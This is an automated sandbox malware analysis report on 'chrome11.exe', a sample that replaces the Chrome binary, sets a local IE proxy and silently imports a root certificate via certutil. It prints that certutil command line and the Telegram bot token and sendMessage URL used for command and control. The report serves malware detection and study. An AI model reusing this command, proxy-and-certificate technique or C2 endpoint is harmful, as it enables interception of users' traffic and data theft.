Edit tour

Windows Analysis Report
chrome11.exe

Overview

General Information

Sample name:	chrome11.exe
Analysis ID:	1577377
MD5:	5b39766f490f17925defaee5de2f9861
SHA1:	9c89f2951c255117eb3eebcd61dbecf019a4c186
SHA256:	de615656d7f80b5e01bc6a604a780245ca0ccefd920a6e2f1439bf27c02b7b7a
Tags:	18521511316185215113209bulletproofexeuser-abus3reports
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Enables a proxy for the internet explorer

Infects executable files (exe, dll, sys, html)

Installs new ROOT certificates

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sets a proxy for the internet explorer

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops certificate files (DER)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious PFX File Creation

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

chrome11.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\chrome11.exe" MD5: 5B39766F490F17925DEFAEE5DE2F9861)

certutil.exe (PID: 3284 cmdline: "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\user\AppData\Local\Temp\tmp267C.tmp" MD5: F17616EC0522FC5633151F7CAA278CAA)

conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Sigma Signatures

Sigma detected: Suspicious PFX File Creation

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\chrome11.exe, ProcessId: 6220, TargetFilename: C:\Users\user\AppData\Local\Temp\rootCert.pfx

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: localhost:8777, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\chrome11.exe, ProcessId: 6220, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	ReversingLabs: Detection: 31%
Source: C:\Program Files\Google\Chrome\Application\original.exe (copy)	ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: chrome11.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 94.0% probability

Source: C:\Users\user\Desktop\chrome11.exe

Directory created: C:\Program Files\Google\Chrome\Application\chrome.exe

Jump to behavior

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49704 version: TLS 1.2

Source: chrome11.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\HP\Desktop\SilentProxy\bin\Debug\chrome.pdb source: chrome11.exe, chrome.exe.1.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\chrome11.exe

System file written: C:\Program Files\Google\Chrome\Application\chrome.exe

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	Code function: 4x nop then jmp 00007FFB4AD76050h	1_2_00007FFB4AD75EDE
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 4x nop then mov edx, dword ptr [ebp-18h]	1_2_00007FFB4AD7A039
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 4x nop then jmp 00007FFB4AD80459h	1_2_00007FFB4AD80403
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 4x nop then dec eax	1_2_00007FFB4AF71259

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

HTTP traffic detected: POST /bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessage HTTP/1.1Content-Type: application/json; charset=utf-8Host: api.telegram.orgContent-Length: 95Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: api.telegram.org

Source: unknown

Source: chrome11.exe, chrome.exe.1.dr	String found in binary or memory: http://.css
Source: chrome11.exe, chrome.exe.1.dr	String found in binary or memory: http://.jpg
Source: chrome11.exe, 00000001.00000002.2460149303.00000103ABBB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: chrome11.exe, chrome.exe.1.dr	String found in binary or memory: http://html4/loose.dtd
Source: chrome11.exe, 00000001.00000002.2460149303.00000103ABB8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome11.exe, 00000001.00000002.2460149303.00000103ABB8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: chrome11.exe, chrome.exe.1.dr	String found in binary or memory: https://api.telegram.org/bot
Source: chrome11.exe, 00000001.00000002.2460149303.00000103ABB07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/
Source: chrome11.exe, 00000001.00000002.2460149303.00000103ABB07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessage

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49704 version: TLS 1.2

E-Banking Fraud

Sets a proxy for the internet explorer

Source: C:\Users\user\Desktop\chrome11.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ProxyServer

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	File created: C:\Users\user\AppData\Local\Temp\rootCert.pfx			Jump to dropped file
Source: C:\Users\user\Desktop\chrome11.exe	File created: C:\Users\user\AppData\Local\Temp\tmp267C.tmp			Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Enables a proxy for the internet explorer

Source: C:\Users\user\Desktop\chrome11.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ProxyEnable

Jump to behavior

Sets a proxy for the internet explorer

Source: C:\Users\user\Desktop\chrome11.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ProxyServer

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	Code function: 1_2_00007FFB4AD74D32	1_2_00007FFB4AD74D32
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 1_2_00007FFB4AD81442	1_2_00007FFB4AD81442
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 1_2_00007FFB4AD73F86	1_2_00007FFB4AD73F86
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 1_2_00007FFB4AD814AD	1_2_00007FFB4AD814AD
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 1_2_00007FFB4AF691BD	1_2_00007FFB4AF691BD

Source: Joe Sandbox View	Dropped File: C:\Program Files\Google\Chrome\Application\chrome.exe DE615656D7F80B5E01BC6A604A780245CA0CCEFD920A6E2F1439BF27C02B7B7A
Source: Joe Sandbox View	Dropped File: C:\Program Files\Google\Chrome\Application\original.exe (copy) DE615656D7F80B5E01BC6A604A780245CA0CCEFD920A6E2F1439BF27C02B7B7A

Source: chrome11.exe, 00000001.00000000.1450410970.00000103A9A42000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamechrome.exe< vs chrome11.exe
Source: chrome11.exe, 00000001.00000002.2460149303.00000103ABBF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamechrome.exe< vs chrome11.exe
Source: chrome11.exe, 00000001.00000002.2460149303.00000103ABBF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs chrome11.exe
Source: chrome11.exe, 00000001.00000002.2460149303.00000103ABBF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ,\\StringFileInfo\\040904B0\\OriginalFilename vs chrome11.exe
Source: chrome11.exe, 00000001.00000002.2460149303.00000103ABBF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ,\\StringFileInfo\\000004B0\\OriginalFilename vs chrome11.exe
Source: chrome11.exe	Binary or memory string: OriginalFilenamechrome.exe< vs chrome11.exe

Source: classification engine

Classification label: mal84.spre.bank.troj.adwa.evad.winEXE@4/14@1/1

Source: C:\Users\user\Desktop\chrome11.exe

File created: C:\Program Files\Google\Chrome\Application\chrome.exe

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\84ef8e32cf3dd22e15e36759d999f0aa_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
Source: C:\Users\user\Desktop\chrome11.exe	Mutant created: NULL

Source: C:\Users\user\Desktop\chrome11.exe

File created: C:\Users\user\AppData\Local\Temp\unique_laptops.txt

Jump to behavior

Source: chrome11.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: chrome11.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%

Source: C:\Users\user\Desktop\chrome11.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome11.exe

ReversingLabs: Detection: 31%

Source: chrome11.exe

String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>

Source: C:\Users\user\Desktop\chrome11.exe

File read: C:\Users\user\Desktop\chrome11.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\chrome11.exe "C:\Users\user\Desktop\chrome11.exe"
Source: C:\Users\user\Desktop\chrome11.exe	Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\user\AppData\Local\Temp\tmp267C.tmp"
Source: C:\Windows\System32\certutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\chrome11.exe	Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\user\AppData\Local\Temp\tmp267C.tmp"	Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: esdsip.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certenroll.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsparse.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: webservices.dll	Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

Directory created: C:\Program Files\Google\Chrome\Application\chrome.exe

Jump to behavior

Source: chrome11.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: chrome11.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: chrome11.exe

Static file information: File size 4767744 > 1048576

Source: chrome11.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x47de00

Source: chrome11.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: chrome11.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Users\HP\Desktop\SilentProxy\bin\Debug\chrome.pdb source: chrome11.exe, chrome.exe.1.dr

Source: C:\Users\user\Desktop\chrome11.exe	Code function: 1_2_00007FFB4AD7AAE0 push es; retn 7002h	1_2_00007FFB4AD7C0BD
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 1_2_00007FFB4AD77414 push ss; retf	1_2_00007FFB4AD77417
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 1_2_00007FFB4AD78131 push ebx; ret	1_2_00007FFB4AD7816A
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 1_2_00007FFB4AD778E8 push ebx; retf	1_2_00007FFB4AD7796A
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 1_2_00007FFB4AD779DA push E95DB62Ch; ret	1_2_00007FFB4AD77A49
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 1_2_00007FFB4AF6B459 push FFFFFF91h; iretd	1_2_00007FFB4AF6B45B
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 1_2_00007FFB4AF6FB46 push ss; iretd	1_2_00007FFB4AF6FB47
Source: C:\Users\user\Desktop\chrome11.exe	Code function: 1_2_00007FFB4AF6270C push E8FFFFFDh; retf	1_2_00007FFB4AF62711

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\chrome11.exe

System file written: C:\Program Files\Google\Chrome\Application\chrome.exe

Jump to behavior

Installs new ROOT certificates

Source: C:\Windows\System32\certutil.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C3DAC379B834C7676F11C5756DB72DFAC6DF57BE Blob	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C3DAC379B834C7676F11C5756DB72DFAC6DF57BE Blob	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C3DAC379B834C7676F11C5756DB72DFAC6DF57BE Blob	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C3DAC379B834C7676F11C5756DB72DFAC6DF57BE Blob	Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	File created: C:\Program Files\Google\Chrome\Application\chrome.exe			Jump to dropped file
Source: C:\Users\user\Desktop\chrome11.exe	File created: C:\Program Files\Google\Chrome\Application\original.exe (copy)			Jump to dropped file

Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
